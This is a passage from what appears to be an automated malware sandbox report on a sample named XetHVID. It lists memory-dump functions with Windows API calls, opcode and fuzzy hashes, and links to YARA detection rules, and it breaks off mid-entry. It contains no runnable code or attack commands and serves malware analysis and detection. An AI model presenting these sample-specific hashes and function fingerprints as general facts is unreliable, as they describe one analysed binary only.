                                                                  • Opcode ID: 9eabc8143fe3adc2cec84bfdb0e06db645dc19c9e3f51bb2f103ae863036c1ea
                                                                  • Instruction ID: fff289769bf829fa55502071bb5b65eaf642c21fd4cc41e539207ba8177b7632
                                                                  • Opcode Fuzzy Hash: 9eabc8143fe3adc2cec84bfdb0e06db645dc19c9e3f51bb2f103ae863036c1ea
                                                                  • Instruction Fuzzy Hash: 551167B18003499FCB10DFAAC844ADFBFF5EF88320F108819E91AA7250C735A950DFA1
                                                                  Function 07655468 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730447600.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7650000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  • Opcode ID: ff5a18dbfeaaa34230d2d0325b82d6c938e25ed21796bc09d74da740d9de364d
                                                                  • Instruction ID: 87fdf63429eb177e56f457e2763fcbf438ba859d20de8864950ee18aa6fdcb62
                                                                  • Opcode Fuzzy Hash: ff5a18dbfeaaa34230d2d0325b82d6c938e25ed21796bc09d74da740d9de364d
                                                                  • Instruction Fuzzy Hash: 94115BB19003498BCB10DFAAD4457DFFBF5EB89324F208419D45AA7240CB79A544CBA5
                                                                  Function 07655470 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730447600.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7650000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  • Opcode ID: 3f1afe770ac5f1d60ed048f0e6bdb281da159fd54210d3b4f6f1e2e1ed91e5dc
                                                                  • Instruction ID: 6345b7b9a737818c213ec0173616c0f0239e2fb3b470ddd68b83ca0318d04d0b
                                                                  • Opcode Fuzzy Hash: 3f1afe770ac5f1d60ed048f0e6bdb281da159fd54210d3b4f6f1e2e1ed91e5dc
                                                                  • Instruction Fuzzy Hash: A2113AB19003498FCB14DFAAC4457DEFBF5EF88324F248419D51AA7240CB75A944CBA5
                                                                  Function 07658C52 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 07658CB5
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730447600.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7650000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost
                                                                  • String ID:
                                                                  • API String ID: 410705778-0
                                                                  • Opcode ID: 4791782601430627f2897ece58f7805d719361ed9d14fd6fddd06f0b7500a91d
                                                                  • Instruction ID: 83656a2182192d5929bdf4a54a47953cbf37b4675f620392e8adb977f625b189
                                                                  • Opcode Fuzzy Hash: 4791782601430627f2897ece58f7805d719361ed9d14fd6fddd06f0b7500a91d
                                                                  • Instruction Fuzzy Hash: 7D11F5B68003499FDB10DF99D989BDEFBF8FB49320F208419D919A3641C375A644CFA1
                                                                  Function 07654188 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 07658CB5
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730447600.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7650000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost
                                                                  • String ID:
                                                                  • API String ID: 410705778-0
                                                                  • Opcode ID: 8308f94ec8c6b8c1ac0eb52cc1bc15f7e35fb43ccb2c281fca44d73fd21762e6
                                                                  • Instruction ID: e23ec706609e7dcacc349493a8a693c222ada60715049dde3274d4fab9273770
                                                                  • Opcode Fuzzy Hash: 8308f94ec8c6b8c1ac0eb52cc1bc15f7e35fb43ccb2c281fca44d73fd21762e6
                                                                  • Instruction Fuzzy Hash: 521103B58003499FDB10DF9AC989BDEBBF8EB48320F108819E919A7740C375A944CFA1
                                                                  Function 0135B500 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0135B566
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1724371145.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_1350000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  • Opcode ID: b9d77281e7541c12c8c41859fe1cb5ab521748e70306d411c4bfe72602982afe
                                                                  • Instruction ID: b2c71fc5893fcf0b262e890ed7dd877b2e05c3275aea08786d10c4647a359ac0
                                                                  • Opcode Fuzzy Hash: b9d77281e7541c12c8c41859fe1cb5ab521748e70306d411c4bfe72602982afe
                                                                  • Instruction Fuzzy Hash: C611DFB5C00349CFDB14DF9AC844A9EFBF5AB88728F10841AD919B7650C375A545CFA1
                                                                  Function 073C2D98 Relevance: 1.5, Strings: 1, Instructions: 217COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (hq
                                                                  • API String ID: 0-4060669308
                                                                  • Opcode ID: 797aa65e6c7a9e75afa69f0b17f30861853f0439f30c151a173bb526857fb94e
                                                                  • Instruction ID: 67a56026beace3ad6651c4b555602bfc86906e687c5c1b352329551ed8a1feaf
                                                                  • Opcode Fuzzy Hash: 797aa65e6c7a9e75afa69f0b17f30861853f0439f30c151a173bb526857fb94e
                                                                  • Instruction Fuzzy Hash: C071B1B16003159FEB25DB29D854BAFBBE6EFC4310F10882EE50A97390DB349D42CB61
                                                                  Function 08CF3007 Relevance: 1.4, Strings: 1, Instructions: 199COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: d8iq
                                                                  • API String ID: 0-742758948
                                                                  • Opcode ID: 2d20cb1e171f7c5ff76579110f5e39c592ddeb2ae7bceae4aa44e95e91c8c14e
                                                                  • Instruction ID: 248b206e839fcd2c25d1267ba82f0c5deacbe94ee4eb8e4a556444e6c50b2df1
                                                                  • Opcode Fuzzy Hash: 2d20cb1e171f7c5ff76579110f5e39c592ddeb2ae7bceae4aa44e95e91c8c14e
                                                                  • Instruction Fuzzy Hash: 1471B235B01158EFDF55DF78D844A9E7FB1AF88712F14846AE902AB391CB709D42CBA0
                                                                  Function 08CF29B8 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Hhq
                                                                  • API String ID: 0-4210879014
                                                                  • Opcode ID: c13e686b777978f888cb64350b0b196875b46413ce1e66b86e63254e344cb777
                                                                  • Instruction ID: 7acfe30b277691bf8d5464ee7b7985ae5f553793ea399b5a7bff273055a9b082
                                                                  • Opcode Fuzzy Hash: c13e686b777978f888cb64350b0b196875b46413ce1e66b86e63254e344cb777
                                                                  • Instruction Fuzzy Hash: BD21F830605244AFE7429F78DC16BAA7FB5EB85700F00C4A6E645DB382DE748A05DB61
                                                                  Function 073CEDE8 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Tedq
                                                                  • API String ID: 0-228892971
                                                                  • Opcode ID: 2817dfde7192b7efbd85b9a95b4f240ca5c65d345b13d703b7734aa0669bb1e7
                                                                  • Instruction ID: 58beba3f39207e351d7d855898424294a9ea91bcde7487234d7e059562631e42
                                                                  • Opcode Fuzzy Hash: 2817dfde7192b7efbd85b9a95b4f240ca5c65d345b13d703b7734aa0669bb1e7
                                                                  • Instruction Fuzzy Hash: 2931EAB4E052188BEB14DFAAC8446EEFBFABF89300F14D02AD419AB355DB745905CF50
                                                                  Function 08CF29C8 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Hhq
                                                                  • API String ID: 0-4210879014
                                                                  • Opcode ID: ea10b9846c8856410e0a2b0cd20f82056ee80e8eee2951722dd9a1c8a5dc866a
                                                                  • Instruction ID: ae42d0928b133d0e90e277d2e6e00a3281e0e1ac6902a99ac96b92a693de32e0
                                                                  • Opcode Fuzzy Hash: ea10b9846c8856410e0a2b0cd20f82056ee80e8eee2951722dd9a1c8a5dc866a
                                                                  • Instruction Fuzzy Hash: 4A21F330A04244AFEB429F78CC16BAA7FB6EF85701F00C4A6E645DB282CE748E05D761
                                                                  Function 0563EC89 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: WR
                                                                  • API String ID: 0-3624004776
                                                                  • Opcode ID: 962b71f9ef19ff0989f7a86a3de81e428eaa27dc1b15c808b4144b8f688379f8
                                                                  • Instruction ID: ef72f501521e02ad9fd86faa2001aa961ce2b1a5a8e7864069da089d3fde68aa
                                                                  • Opcode Fuzzy Hash: 962b71f9ef19ff0989f7a86a3de81e428eaa27dc1b15c808b4144b8f688379f8
                                                                  • Instruction Fuzzy Hash: 8121E3317043009FD711EF38D44599BBFEAEF81210B0488AAE50ACB751EB71A90ACBA1
                                                                  Function 073C8E68 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $dq
                                                                  • API String ID: 0-847773763
                                                                  • Opcode ID: bd6cb0ca8e124487e854b73fd042c869c1ea0c9604d5e7cc8566fff7c9fc31aa
                                                                  • Instruction ID: b378db8bc2fd497bdc207fa4e7da5d004cd655f46b7e13ed30c17a6d1afeba80
                                                                  • Opcode Fuzzy Hash: bd6cb0ca8e124487e854b73fd042c869c1ea0c9604d5e7cc8566fff7c9fc31aa
                                                                  • Instruction Fuzzy Hash: D51196F191D260DFE321E67495102F57BA95B43205F1488DFD44ECBD92C63A8F4183A7
                                                                  Function 073C7D58 Relevance: 1.3, Strings: 1, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: W
                                                                  • API String ID: 0-655174618
                                                                  • Opcode ID: 23eef5746988b570fcad3722f7bec614450aae8e693162712e3e13cd7c2fbe23
                                                                  • Instruction ID: ae5f206dc1d1ea4d70cd69bf2e3b6c94c96c10336c4f1143d83abfab34b5267a
                                                                  • Opcode Fuzzy Hash: 23eef5746988b570fcad3722f7bec614450aae8e693162712e3e13cd7c2fbe23
                                                                  • Instruction Fuzzy Hash: 3F016DB155C394CFE341D678C4042B97FB65B43309F0880AED4484FA8BC33A9C86CB22
                                                                  Function 073C82C1 Relevance: 1.3, Strings: 1, Instructions: 34COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $dq
                                                                  • API String ID: 0-847773763
                                                                  • Opcode ID: 696e526d357aa57e84859b9e7ded3edefa31a01263305c47de770e0f25d485e8
                                                                  • Instruction ID: b740fd9d5f2dda3f43b61c75717e773db7eae4e68058c602758e4d93a41269cd
                                                                  • Opcode Fuzzy Hash: 696e526d357aa57e84859b9e7ded3edefa31a01263305c47de770e0f25d485e8
                                                                  • Instruction Fuzzy Hash: 45F062F4915515CBF310CA04DA083A4F7A5FB06346F5982BEA40EC7D41C7768E82C79A
                                                                  Function 073C6D20 Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: G
                                                                  • API String ID: 0-985283518
                                                                  • Opcode ID: efe267f8a454f9f87472615b165d47cb328cff69364af645978846172810f453
                                                                  • Instruction ID: a2a7351f51a185ee5016849486481254e7688765a91b8ec71b29cbcbce7522ff
                                                                  • Opcode Fuzzy Hash: efe267f8a454f9f87472615b165d47cb328cff69364af645978846172810f453
                                                                  • Instruction Fuzzy Hash: D6D05EF180D108E7D710CE54DC5627CBBAC8B01218F21049AD80D86941CB695E615692
                                                                  Function 073C6D30 Relevance: 1.3, Strings: 1, Instructions: 11COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: G
                                                                  • API String ID: 0-985283518
                                                                  • Opcode ID: 54b9940d3fcdbe1453f0ee35c3226cbae6bb1fbb988d13bdc4f61a4f23937b0e
                                                                  • Instruction ID: f69d461b5d6ed4f459e4705087c1d0007740410ab01a41d9cbd514381a714605
                                                                  • Opcode Fuzzy Hash: 54b9940d3fcdbe1453f0ee35c3226cbae6bb1fbb988d13bdc4f61a4f23937b0e
                                                                  • Instruction Fuzzy Hash: 71C012F1419108EBE604CE84D90A63CBBBC9742218F00009AE80E42A00CF711E20AB92
                                                                  Function 08CF0040 Relevance: .7, Instructions: 749COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 33474d069536d05166d048dcb9f6d9d9ffeb7c9ed34ba502cd2acff8d74ec5ac
                                                                  • Instruction ID: 4a02a08c55c220f8d07a391b77f17a8840528ec8565f6c1112dc8577f5373a25
                                                                  • Opcode Fuzzy Hash: 33474d069536d05166d048dcb9f6d9d9ffeb7c9ed34ba502cd2acff8d74ec5ac
                                                                  • Instruction Fuzzy Hash: DE62E071E00F418AE7B49FB4845C3AE7AA1AB41705FB04A3FD1AACA352DB349543CF59
                                                                  Function 08CFC5F0 Relevance: .5, Instructions: 523COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0419aa238f863e08a52de7cf49795e8d6225f3e34fe31d067a87b0294c4b8f02
                                                                  • Instruction ID: b31452195d1cff8d24b7399c8a9569fb3bc6f7138d10a5294e93c35301629a43
                                                                  • Opcode Fuzzy Hash: 0419aa238f863e08a52de7cf49795e8d6225f3e34fe31d067a87b0294c4b8f02
                                                                  • Instruction Fuzzy Hash: 0142F330E1061DCFDB54EFA8C8446DCBBB1BF49300F5182A9D5497B265EB30AA99CF91
                                                                  Function 08CFC5E0 Relevance: .5, Instructions: 520COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a5ea6349aeb96a4aca552862fb1ad45df5c292853d73b0c754f711e18ffb0b91
                                                                  • Instruction ID: 230868c5022cddfc2a45db2c93cd613cfb99949435b8541638fc54279ef09055
                                                                  • Opcode Fuzzy Hash: a5ea6349aeb96a4aca552862fb1ad45df5c292853d73b0c754f711e18ffb0b91
                                                                  • Instruction Fuzzy Hash: DE42F330E1061DCFDB54EFA8C8446DCBBB1BF49300F5182AAD5497B265EB309A99CB91
                                                                  Function 08CF001D Relevance: .5, Instructions: 457COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 91bdc917a95e35725e544b13a2e093059bb75b3247341d2911bf13711f3dabd4
                                                                  • Instruction ID: cdf130de55dd067ecd6d84f0a3ac3112e25951ca227cbbf5430a4554de9edd1e
                                                                  • Opcode Fuzzy Hash: 91bdc917a95e35725e544b13a2e093059bb75b3247341d2911bf13711f3dabd4
                                                                  • Instruction Fuzzy Hash: 9E225CB0905F424AE7B45FA4848C39EB6A0AB05715FB04A6FC2FACA357D7349187CF49
                                                                  Function 073C1790 Relevance: .4, Instructions: 378COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c6ba6e1179c29f0d533d41c4db1ba536f610d07bc13fd369b7280ff39fbccdd3
                                                                  • Instruction ID: 928d85066e81d0cb0e8b3e48c733c6672a14fa909e9c9fb6b3a1fb6abb278d12
                                                                  • Opcode Fuzzy Hash: c6ba6e1179c29f0d533d41c4db1ba536f610d07bc13fd369b7280ff39fbccdd3
                                                                  • Instruction Fuzzy Hash: F0B10FF1B14206DFEB15EB64C5496BEBFB5EF42300F5584ADD44AA3295EA31CC248B83
                                                                  Function 073C7740 Relevance: .4, Instructions: 364COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d5a0b49cab48a4ef5bec4cda9cca7dd02354dff644c85ced8b6abc2d63d4e13b
                                                                  • Instruction ID: e445e9fee49d82c2cd843fd5cad7bc562deb2c9b2ba9d3bfa1c1909f816ff45f
                                                                  • Opcode Fuzzy Hash: d5a0b49cab48a4ef5bec4cda9cca7dd02354dff644c85ced8b6abc2d63d4e13b
                                                                  • Instruction Fuzzy Hash: 7BD1F875B002589FEB00EFB8D4556AE7BF5EF84300F1488A9D9499B386CB349D46C7D1
                                                                  Function 08CF9738 Relevance: .3, Instructions: 341COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b7d6913aa783a8331ba812cb4c7a26f67bb8e079f91012ae32e9fcb53e590cc3
                                                                  • Instruction ID: 3dcd9bb543995734f244742b8e779685e9d36e2ec730ac5f8b458a020125ec36
                                                                  • Opcode Fuzzy Hash: b7d6913aa783a8331ba812cb4c7a26f67bb8e079f91012ae32e9fcb53e590cc3
                                                                  • Instruction Fuzzy Hash: AFB1CB71A00209CFEB61DFA9C9506AEFFB2FF88311F20452EC609A7242DB309D56CB51
                                                                  Function 073C0480 Relevance: .3, Instructions: 332COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e7e1a6f02718d63fed1e3118596c6279458af461d2dc3f9f7355b69b4d06b529
                                                                  • Instruction ID: 43269449e7424ac220d4c801771ed4da6a6514fe71141de6d91f473819aa8fd2
                                                                  • Opcode Fuzzy Hash: e7e1a6f02718d63fed1e3118596c6279458af461d2dc3f9f7355b69b4d06b529
                                                                  • Instruction Fuzzy Hash: 7DF1C771D1061ACBCF14DFA8C854AEEB7B5FF49300F1086AAD549B7254EB70AA85CF90
                                                                  Function 073C0471 Relevance: .3, Instructions: 305COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dfa4d9f9e981f4c5870f99ea552db57f352cf7d2aa44f1dc754a5411d507c9da
                                                                  • Instruction ID: 5bd01c75eed00d7e3913a11c7fcb83951be19bd0adab954c0346c585f2612f9f
                                                                  • Opcode Fuzzy Hash: dfa4d9f9e981f4c5870f99ea552db57f352cf7d2aa44f1dc754a5411d507c9da
                                                                  • Instruction Fuzzy Hash: BDE1C671D1061ACBCF14DFA8C854AEDBBB5BF49300F1086AAD549B7254EB70AA85CF90
                                                                  Function 08CF7D60 Relevance: .3, Instructions: 289COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 97fffbdda1d55bf6a3bf1d271c4fd0e522d03d727d7c527a2c1e72fc0a26520d
                                                                  • Instruction ID: c4a2ca4f7c13b43503a4e8999bfe2019a5d0363f65c96204aae14c34665f9ba9
                                                                  • Opcode Fuzzy Hash: 97fffbdda1d55bf6a3bf1d271c4fd0e522d03d727d7c527a2c1e72fc0a26520d
                                                                  • Instruction Fuzzy Hash: 6CB13835A106148FDB44DF69D494AAEBBF6EF88701F5540B9E606EB3A2CB30DD42CB50
                                                                  Function 08CFBDB0 Relevance: .2, Instructions: 233COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b890bd53d8b119d0fc9b1e195335cd1fe4903377f8d219818b7fc46289c17de5
                                                                  • Instruction ID: 6a6cdc5617bc62eb6ebd1bf2f612e9b2f8849bb42f93400834be1e7a663d6cca
                                                                  • Opcode Fuzzy Hash: b890bd53d8b119d0fc9b1e195335cd1fe4903377f8d219818b7fc46289c17de5
                                                                  • Instruction Fuzzy Hash: 9A91AE34A00609DFDB40AF68D4886ADBBB1FF45311F11846AE645AB266EB30DA56CF80
                                                                  Function 073C4AA1 Relevance: .2, Instructions: 232COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 24ad0fb2117bf9d91338e3711537bddc2233802f1f258bc947c104fb649cbef8
                                                                  • Instruction ID: 922f266adb7985e569a1d8a234c6e4a8ee287102143e0b63fd35ea133ddd648a
                                                                  • Opcode Fuzzy Hash: 24ad0fb2117bf9d91338e3711537bddc2233802f1f258bc947c104fb649cbef8
                                                                  • Instruction Fuzzy Hash: 95B1F675910619CFDB10EF68C894AD8FBB1FF49304F05C699E549BB215EB30AA89CF90
                                                                  Function 08CF9AF8 Relevance: .2, Instructions: 211COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ba5ad649c8d2dda94a7750f13120524251b23e658afe5f5ce6e5697453770697
                                                                  • Instruction ID: 0a8d34e65266397ad5fe3b42007917e3adc383410ddf7b6145ae23e571030a3a
                                                                  • Opcode Fuzzy Hash: ba5ad649c8d2dda94a7750f13120524251b23e658afe5f5ce6e5697453770697
                                                                  • Instruction Fuzzy Hash: AE910374A0020A9FDF65CFA8C980ADEBBF2FF48311F048569E92997351D731EA56CB50
                                                                  Function 073C771E Relevance: .2, Instructions: 189COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
